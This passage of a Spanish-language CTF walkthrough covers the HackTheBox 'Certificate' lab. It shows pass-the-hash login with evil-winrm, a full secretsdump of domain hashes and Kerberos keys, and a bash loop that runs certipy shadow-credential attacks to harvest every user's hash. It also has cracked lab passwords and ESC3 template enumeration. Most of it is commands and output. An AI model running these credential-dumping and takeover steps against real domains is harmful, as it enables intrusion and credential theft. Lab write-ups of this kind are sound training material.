[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6

Verificamos con netexec que el hash es valido para el servicio de WinRM.

1
2
3
4
5
❯ netexec winrm 10.10.11.71 -u administrator -H d804304519bf0143c14cbf1c024408c6 2>/dev/null
WINRM       10.10.11.71     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)
WINRM       10.10.11.71     5985   DC01             [+] certificate.htb\administrator:d804304519bf0143c14cbf1c024408c6 (Pwn3d!)
WINRM       10.10.11.71     5985   DC01             [-] certificate.htb\administrator:d804304519bf0143c14cbf1c024408c6 zip() argument 2 is longer than argument 1

Shell

Ingresamos por el servicio WinRM logrando realizar la lectura de la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ evil-winrm -i certificate.htb -u administrator -H d804304519bf0143c14cbf1c024408c6
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ../Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/6/2025   5:31 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
5868c0f57a2b226a99d1e9f429bbdf42
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Dump Hashes

Realizamos un dump de las hashes con impacket-secretdumps.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
❯ faketime -f +8h impacket-secretsdump  certificate/administrator@certificate.htb -hashes :d804304519bf0143c14cbf1c024408c6
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x5cea1e66da8824f09a4e388596e60a4a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:60f6b8c46a9c6d8e0635b619c069b2ae:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
CERTIFICATE\DC01$:aes256-cts-hmac-sha1-96:37e0e73332edfcc623b54ae20124ba786f453d664b05c950e19957b01aa82226
CERTIFICATE\DC01$:aes128-cts-hmac-sha1-96:cb4b0249daf270bce4f51db03e407c38
CERTIFICATE\DC01$:des-cbc-md5:0219c23d986eefb0
CERTIFICATE\DC01$:plain_password_hex:b9e738a3d3c27735c6c2e77c4718f2434791aa8de0ccd96c4570de531c91fc7c96973fef80e4cbc9f9a00217923216eb5c2f6e64699f0d53c97f5f44d40e40cb4d4cbb8a7e3e85eefce6b72c43740e5a5a87a83a041e5bca193771025752807f8db1a666382fcabb9eca24822746fb5197638ef3515a9a8e7ea3b48a6656bc9152e0a9167026cf36961a320806768ab02438a4444efdcd043cf1a3d3f78152006ea52e5dae8364b7f64f9dacca923478bfbd24686af0a907a531e5329f1e8ce95d0b9da1513f6637fd34084e06dc93a1fd2e36d74aab657e2bdf0ac00352a3085ff70f2dd53e21c160e99a11960cebdf
CERTIFICATE\DC01$:aad3b435b51404eeaad3b435b51404ee:f36e0bc3c9a34c3acdb8b79df54f27cd:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xc3ff4e4015e130aeac8a1230c29c6cd80a123f75
dpapi_userkey:0x36a4f4aae2cdbee83d6abfc5e9d546d09e8eaf04
[*] NL$KM 
 0000   DB 80 E3 7D 2D F9 3B 06  ED DB EC 4B 5B 13 1C 1E   ...}-.;....K[...
 0010   18 0E 97 5D 3E A9 50 81  F9 92 9A 32 97 BC FB 94   ...]>.P....2....
 0020   D0 69 3D C3 70 3C BD 83  AE 53 66 03 3C E7 DB 69   .i=.p<...Sf.<..i
 0030   CF F4 A1 16 B2 58 38 56  2E CF E8 8F 38 51 A3 EE   .....X8V....8Q..
NL$KM:db80e37d2df93b06eddbec4b5b131c1e180e975d3ea95081f9929a3297bcfb94d0693dc3703cbd83ae5366033ce7db69cff4a116b25838562ecfe88f3851a3ee
[*] _SC_Apache2.4 
CERTIFICATE\xamppuser:x@mppUserPwd!
[*] _SC_mysql 
CERTIFICATE\xamppuser:x@mppUserPwd!
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9de0f65ce37b57bc0a8fce1f9d4402c7:::
Kai.X:1105:aad3b435b51404eeaad3b435b51404ee:003c4c38e98c78352362095a6028f720:::
Sara.B:1109:aad3b435b51404eeaad3b435b51404ee:c2367169e3279fa3e85d9d25f0e85e45:::
John.C:1111:aad3b435b51404eeaad3b435b51404ee:3f6d0e5bbf21d7f1c72a8eebc82547f5:::
Aya.W:1112:aad3b435b51404eeaad3b435b51404ee:a72e757f0f5859819e90d1a71666f933:::
Nya.S:1113:aad3b435b51404eeaad3b435b51404ee:a72e757f0f5859819e90d1a71666f933:::
Maya.K:1114:aad3b435b51404eeaad3b435b51404ee:a72e757f0f5859819e90d1a71666f933:::
Lion.SK:1115:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Eva.F:1116:aad3b435b51404eeaad3b435b51404ee:f30914c4b456ef5691bf24b50b332e99:::
Ryan.K:1117:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
certificate.htb\akeder.kh:1119:aad3b435b51404eeaad3b435b51404ee:9ca9ba1e46bd75574002b8b1967bb2de:::
kara.m:1121:aad3b435b51404eeaad3b435b51404ee:831a13eb0ff31d5b80eb062f24bfb210:::
Alex.D:1124:aad3b435b51404eeaad3b435b51404ee:32be964c0519ef40083157825c7949ca:::
certificate.htb\karol.s:1127:aad3b435b51404eeaad3b435b51404ee:a242ea4fbd87f0feff1203bad168b770:::
saad.m:1128:aad3b435b51404eeaad3b435b51404ee:a242ea4fbd87f0feff1203bad168b770:::
xamppuser:1130:aad3b435b51404eeaad3b435b51404ee:ed547ca356c218f5e76c2640fc3429ab:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:f36e0bc3c9a34c3acdb8b79df54f27cd:::
WS-01$:1103:aad3b435b51404eeaad3b435b51404ee:3641f1cd0daa8dfe41e1d1b2dbbed6f4:::
WS-05$:1131:aad3b435b51404eeaad3b435b51404ee:eae20b8c895e7ac2e1a4870f71738058:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:28934e3c2d87ea8123c8a2c2189175d2c9b19a3fd6a1e510e7f96d7b7778703b
Administrator:aes128-cts-hmac-sha1-96:a019041d011b4af3978fe35dc601674b
Administrator:des-cbc-md5:ea5eef85f7681373
krbtgt:aes256-cts-hmac-sha1-96:59ba38be08a47d21666a346bf6e525509cc91e8f318658e26a1d06b28868571e
krbtgt:aes128-cts-hmac-sha1-96:3ef27c98cdb9669963d09bdf0a43b8bf
krbtgt:des-cbc-md5:2c753ed0988abc92
Kai.X:aes256-cts-hmac-sha1-96:116143b655fa31afae0914f10b85105cdf7681d54ff7039e4d80d922082de596
Kai.X:aes128-cts-hmac-sha1-96:381e6ff043963c7c2c5ed37fc4cfbdd6
Kai.X:des-cbc-md5:c8ef52989445f4f7
Sara.B:aes256-cts-hmac-sha1-96:92fe5c9c7e3d3f5902335cf5b08ae7429dd68708dbe9df507c1853dfcd2ce2d2
Sara.B:aes128-cts-hmac-sha1-96:6194d1e2212a019abd4fa9979c1acd07
Sara.B:des-cbc-md5:19349edfceb6b979
John.C:aes256-cts-hmac-sha1-96:da04bfe09f83cd3ba3b4819d883b647ced8de73fe8e6ff32953fc3c964a61cd5
John.C:aes128-cts-hmac-sha1-96:bc774e9044a071ce5eee8338cfa50831
John.C:des-cbc-md5:6e981976ad91646b
Aya.W:aes256-cts-hmac-sha1-96:d1432310b9711f49f0c3094f9f844d0e12220b5fc3a082171c5eb26a26ffd98c
Aya.W:aes128-cts-hmac-sha1-96:3894a9cda7439dc0982e8bfc981c6d37
Aya.W:des-cbc-md5:8f01013e6b68e54a
Nya.S:aes256-cts-hmac-sha1-96:30aab7542b5cd28335df6d4db7a02bf33bef5440bdd7588f955d690de9fd07d7
Nya.S:aes128-cts-hmac-sha1-96:79006be0640212bd3f57fb38d011d9d2
Nya.S:des-cbc-md5:f4f18f1c10e3b351
Maya.K:aes256-cts-hmac-sha1-96:482276cf4da25e6fe9a3f7a380d99a0ce552d443d7b16fea2bb2bf1ad2ae3e8a
Maya.K:aes128-cts-hmac-sha1-96:c18058497f430d129861f41c4241f04b
Maya.K:des-cbc-md5:ba34f1f19751d52f
Lion.SK:aes256-cts-hmac-sha1-96:aa53dc8d118e89f237a7c99ab0ec0b858acb5458d5b82826899133cc6836f302
Lion.SK:aes128-cts-hmac-sha1-96:92c23bd3d45cec51430995d18f3446c8
Lion.SK:des-cbc-md5:bfd998612a43c24f
Eva.F:aes256-cts-hmac-sha1-96:60f2c643add6e126180fe2a34bbec9e1bca0c2eb6efe5e655a06ae9901e1cba8
Eva.F:aes128-cts-hmac-sha1-96:8a64f57bfadb0fabae673406e8b6fa73
Eva.F:des-cbc-md5:7620e61a3886b5b3
Ryan.K:aes256-cts-hmac-sha1-96:55f6dadebca88eced9b93d558808e3da2b539d9601a94eb8644de9160f300a13
Ryan.K:aes128-cts-hmac-sha1-96:24e72d5c03590213e1a80b851a01671c
Ryan.K:des-cbc-md5:4c4c6d23e5cb762a
certificate.htb\akeder.kh:aes256-cts-hmac-sha1-96:bbdb1644e7d3ab0cc13ebe542cb3e2bf9024f8c3690d02bdfb8866f222f03bc5
certificate.htb\akeder.kh:aes128-cts-hmac-sha1-96:53a8638de435664ca479dfffc3a47fbd
certificate.htb\akeder.kh:des-cbc-md5:ec1cdc8a0eaeb9f2
kara.m:aes256-cts-hmac-sha1-96:5cc3518a1dfd601f484ba7aa92ac777c7eedf65496175359f23b55f8d5ba41c5
kara.m:aes128-cts-hmac-sha1-96:c201828964b9187554c6238bee79b3cc
kara.m:des-cbc-md5:d67a67912cdf6db0
Alex.D:aes256-cts-hmac-sha1-96:8f00005e0efff69425291686304234126b287ff9c4f3a1edbf6b4ec86b9a1680
Alex.D:aes128-cts-hmac-sha1-96:46db992e8d448542410224702476bdf7
Alex.D:des-cbc-md5:57dc6220fd46517c
certificate.htb\karol.s:aes256-cts-hmac-sha1-96:3e6eaf02de4f20cafd9fdefd97f80fa84d668ee96983a8692bef80dc3f0ce578
certificate.htb\karol.s:aes128-cts-hmac-sha1-96:f734a166ec136b819119908c769ae8d4
certificate.htb\karol.s:des-cbc-md5:437919526efb4557
saad.m:aes256-cts-hmac-sha1-96:25a0b122b539c1f924d1309bc0595f2f7fc047b8405973bdf6e502945143258d
saad.m:aes128-cts-hmac-sha1-96:895c4110710dda478e99cdf9559887d8
saad.m:des-cbc-md5:4020fb4c7aa497d6
xamppuser:aes256-cts-hmac-sha1-96:8c99dec482f65ac7be5ea175dd671caee69a7adfb9275ea8581a57757139b3f6
xamppuser:aes128-cts-hmac-sha1-96:3d63b58ed58b30d1ce3f15c9002d702e
xamppuser:des-cbc-md5:6b40cd8c6bf4fd6b
DC01$:aes256-cts-hmac-sha1-96:37e0e73332edfcc623b54ae20124ba786f453d664b05c950e19957b01aa82226
DC01$:aes128-cts-hmac-sha1-96:cb4b0249daf270bce4f51db03e407c38
DC01$:des-cbc-md5:fd94499b6e15198a
WS-01$:aes256-cts-hmac-sha1-96:05a043c187f9bf02d2374a5fdf169e4c63a8be47c485b5cc44171d765e59e4ac
WS-01$:aes128-cts-hmac-sha1-96:e1cd0218231edfadad47b08a57e24184
WS-01$:des-cbc-md5:df4fd676a85d4f7c
WS-05$:aes256-cts-hmac-sha1-96:0c426e103497f20b76c7d182cc45c2df19d3bc08b6e745ca475adc99f2c42794
WS-05$:aes128-cts-hmac-sha1-96:a19fa3efa03b8c474c048294c3c7b899
WS-05$:des-cbc-md5:9e07545d40f8daa8
[*] Cleaning up... 

Additional Content: Users & ESC3

Se presenta informacion que nos llevo a credenciales/hashes o formas de llegar a otros usuarios. Sin embargo no se tomaron en cuenta ya que Sara.B ya tiene acceso a la mayoria de estos.

Shadow Credential script

Extrajimos y creamos un wordlist de usuarios con el archivo de bloodhound.

1
2
3
4
5
6
7
8
9
❯ unzip DC01_10.10.11.71_2025-06-02_204732_users.json DC01_10.10.11.71_2025-06-02_204732_bloodhound.zip
unzip:  cannot find or open DC01_10.10.11.71_2025-06-02_204732_users.json, DC01_10.10.11.71_2025-06-02_204732_users.json.zip or DC01_10.10.11.71_2025-06-02_204732_users.json.ZIP.
❯ unzip DC01_10.10.11.71_2025-06-02_204732_bloodhound.zip DC01_10.10.11.71_2025-06-02_204732_users.json
Archive:  DC01_10.10.11.71_2025-06-02_204732_bloodhound.zip
 extracting: DC01_10.10.11.71_2025-06-02_204732_users.json  
❯ jq -r '.data[].Properties.name' DC01_10.10.11.71_2025-06-02_204732_users.json | tail -n +2 |  awk '{ print tolower($0) }' | cut -d '@' -f1 > users1.txt
❯ wc -l users1.txt
18 users1.txt

Sara.B tiene permiso GenericAll a traves del grupo Account Operators sobre la mayoria de usuarios, realizamos Shadow Attack para cada usuario para finalmente obtener su hash mediante un script en bash.

1
2
3
4
5
6
7
#!/bin/bash
touch hashes.txt
for user in $(cat users1.txt)
  do
    hash=$(faketime -f +8h certipy-ad shadow auto -u sara.b -p Blink182 -account $user -dc-ip 10.10.11.71 -dc-host dc01.certificate.htb -ns 10.10.11.71 2>/dev/null|tail -n 1| cut -d ":" -f2 | cut -d " " -f2 ); echo "hash for $user: $hash"
    echo "$user:$hash" >> hashes.txt
  done

Tras ejecutar el script logramos obtener el hash de varios usuarios, algunos de ellos parecieran compartir la misma contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
❯ ./hashes.sh
./hashes.sh: line 5: warning: command substitution: ignored null byte in input
hash for xamppuser: 
hash for alex.d: 32be964c0519ef40083157825c7949ca
hash for saad.m: a242ea4fbd87f0feff1203bad168b770
hash for karol.s: a242ea4fbd87f0feff1203bad168b770
hash for kara.m: 831a13eb0ff31d5b80eb062f24bfb210
hash for akeder.kh: 9ca9ba1e46bd75574002b8b1967bb2de
hash for ryan.k: fb54d1c05e301e024800c6ad99fe9b45
hash for eva.f: f30914c4b456ef5691bf24b50b332e99
hash for lion.sk: fb54d1c05e301e024800c6ad99fe9b45
hash for maya.k: a72e757f0f5859819e90d1a71666f933
hash for nya.s: a72e757f0f5859819e90d1a71666f933
hash for aya.w: a72e757f0f5859819e90d1a71666f933
./hashes.sh: line 5: warning: command substitution: ignored null byte in input
hash for sara.b: 
hash for john.c: 3f6d0e5bbf21d7f1c72a8eebc82547f5
./hashes.sh: line 5: warning: command substitution: ignored null byte in input
hash for krbtgt: 
hash for kai.x: 003c4c38e98c78352362095a6028f720
hash for guest: None
./hashes.sh: line 5: warning: command substitution: ignored null byte in input
hash for administrator: 
❯ cat hashes.txt | cut -d ':' -f2  | uniq | grep -v '^$' | head -n -1
32be964c0519ef40083157825c7949ca
a242ea4fbd87f0feff1203bad168b770
831a13eb0ff31d5b80eb062f24bfb210
9ca9ba1e46bd75574002b8b1967bb2de
fb54d1c05e301e024800c6ad99fe9b45
f30914c4b456ef5691bf24b50b332e99
fb54d1c05e301e024800c6ad99fe9b45
a72e757f0f5859819e90d1a71666f933
3f6d0e5bbf21d7f1c72a8eebc82547f5
003c4c38e98c78352362095a6028f720
❯ cat hashes.txt | cut -d ':' -f2  | uniq | grep -v '^$' | head -n -1 | wc -l
10

Crackstation muestra el valor de dos hashes.

Hash Type Result
32be964c0519ef40083157825c7949ca Unknown Not found.
a242ea4fbd87f0feff1203bad168b770 NTLM Princess18
831a13eb0ff31d5b80eb062f24bfb210 Unknown Not found.
9ca9ba1e46bd75574002b8b1967bb2de Unknown Not found.
b1bc3d70e70f4f36b1509a65ae1a2ae6 Unknown Not found.
f30914c4b456ef5691bf24b50b332e99 Unknown Not found.
3b24c391862f4a8531a245a0217708c4 NTLM !QAZ2wsx
a72e757f0f5859819e90d1a71666f933 Unknown Not found.
3f6d0e5bbf21d7f1c72a8eebc82547f5 Unknown Not found.
003c4c38e98c78352362095a6028f720 Unknown Not found.

Password for Kai.X

Durante la enumeracion del directorio Administrator encontramos un archivo comprimido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\users\administrator\AppData\Local\Temp> dir -force winrm-upload


    Directory: C:\users\administrator\AppData\Local\Temp\winrm-upload


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/3/2024   9:41 PM           2528 tmpzip-bdc2b08b68ebb8350958d17184c0a6cab45a75ef.zip


*Evil-WinRM* PS C:\users\administrator\AppData\Local\Temp> download winrm-upload/tmpzip-bdc2b08b68ebb8350958d17184c0a6cab45a75ef.zip
                                        
Info: Downloading C:\users\administrator\AppData\Local\Temp\winrm-upload/tmpzip-bdc2b08b68ebb8350958d17184c0a6cab45a75ef.zip to tmpzip-bdc2b08b68ebb8350958d17184c0a6cab45a75ef.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\users\administrator\AppData\Local\Temp>

Dicho archivo contiene credenciales para el usuario kai.x.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
❯ unzip tmpzip-bdc2b08b68ebb8350958d17184c0a6cab45a75ef.zip -d winrm-upload
Archive:  tmpzip-bdc2b08b68ebb8350958d17184c0a6cab45a75ef.zip
  inflating: winrm-upload/.git-credentials  
  inflating: winrm-upload/dev/DB_connection.php  
  inflating: winrm-upload/dev/analyze_word.php  
  inflating: winrm-upload/dev/config.php  
  inflating: winrm-upload/dev/functions.php  
  inflating: winrm-upload/dev/include.php  
  inflating: winrm-upload/dev/includes.php  
❯ ls -lah
drwxrwxr-x kali kali 4.0 KB Mon Jun  2 22:16:06 2025  .
drwxrwxr-x kali kali 4.0 KB Mon Jun  2 22:16:06 2025  ..
drwxrwxr-x kali kali 4.0 KB Mon Jun  2 22:16:06 2025  dev
.rw-r--r-- kali kali  40 B  Sat Jan  1 00:00:00 2000  .git-credentials
❯ cat .git-credentials
https://kai.x:Terminator1337@github.com

Comprobamos que las credenciales eran validas para el usuario.

1
2
3
4
❯ netexec smb 10.10.11.71 -u kai.x -p Terminator1337
SMB         10.10.11.71     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.71     445    DC01             [+] certificate.htb\kai.x:Terminator1337 

ESC3 for Users

Como lion.sk encontramos que la plantilla Delegated-CRA es vulnerable a ESC3.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
❯ faketime -f +8h certipy-ad find -vulnerable -u lion.sk -hashes c2367169e3279fa3e85d9d25f0e85e45 -dc-ip 10.10.11.71 -dc-host dc01.certificate.htb -ns 10.10.11.71 -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 18 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'Certificate-LTD-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'Certificate-LTD-CA'
[*] Checking web enrollment for CA 'Certificate-LTD-CA' @ 'DC01.certificate.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : Certificate-LTD-CA
    DNS Name                            : DC01.certificate.htb
    Certificate Subject                 : CN=Certificate-LTD-CA, DC=certificate, DC=htb
    Certificate Serial Number           : 75B2F4BBF31F108945147B466131BDCA
    Certificate Validity Start          : 2024-11-03 22:55:09+00:00
    Certificate Validity End            : 2034-11-03 23:05:09+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFICATE.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        ManageCertificates              : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Enroll                          : CERTIFICATE.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Display Name                        : Delegated-CRA
    Certificate Authorities             : Certificate-LTD-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-05T19:52:09+00:00
    Template Last Modified              : 2024-11-05T19:52:10+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain CRA Managers
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFICATE.HTB\Administrator
        Full Control Principals         : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.

La plantilla requiere de un valor de email (SubjectAltRequireEmail) si observamos los usuarios con este atributo no se lista a administrator, pero si otros usuarios a los cuales se puede acceder a traves de la explotacion de la plantilla vulnerable.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
❯ netexec ldap 10.10.11.71 -u sara.b -p 'Blink182' --query "(sAMAccountName=*)" "mail"
LDAP        10.10.11.71     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)
LDAP        10.10.11.71     389    DC01             [+] certificate.htb\sara.b:Blink182 
[...] snip [...]
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Alex Disel,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 alex.d@certificate.htb
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Aya,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 aya.w@certificate.htb
[...] snip [...]
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Eva,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 eva.f@certificate.htb
[...] snip [...]
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=John,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 john.c@certificate.htb
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Kai,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 kai.x@certificate.htb
[...] snip [...]
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Lion,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 lion.sk@certificate.htb
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Marketing,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Maya,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 maya.k@certificate.htb
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Network Configuration Operators,CN=Builtin,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Nya,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 nya.s@certificate.htb
[...]
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Ryan,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 ryan.k@certificate.htb
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Saad Maher,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 saad.m@certificate.htb
LDAP        10.10.11.71     389    DC01             [+] Response for object: CN=Sara,CN=Users,DC=certificate,DC=htb
LDAP        10.10.11.71     389    DC01             mail                 sara.b@certificate.htb
[...] snip [...]
Share on

Dany Sucuc
WRITTEN BY
sckull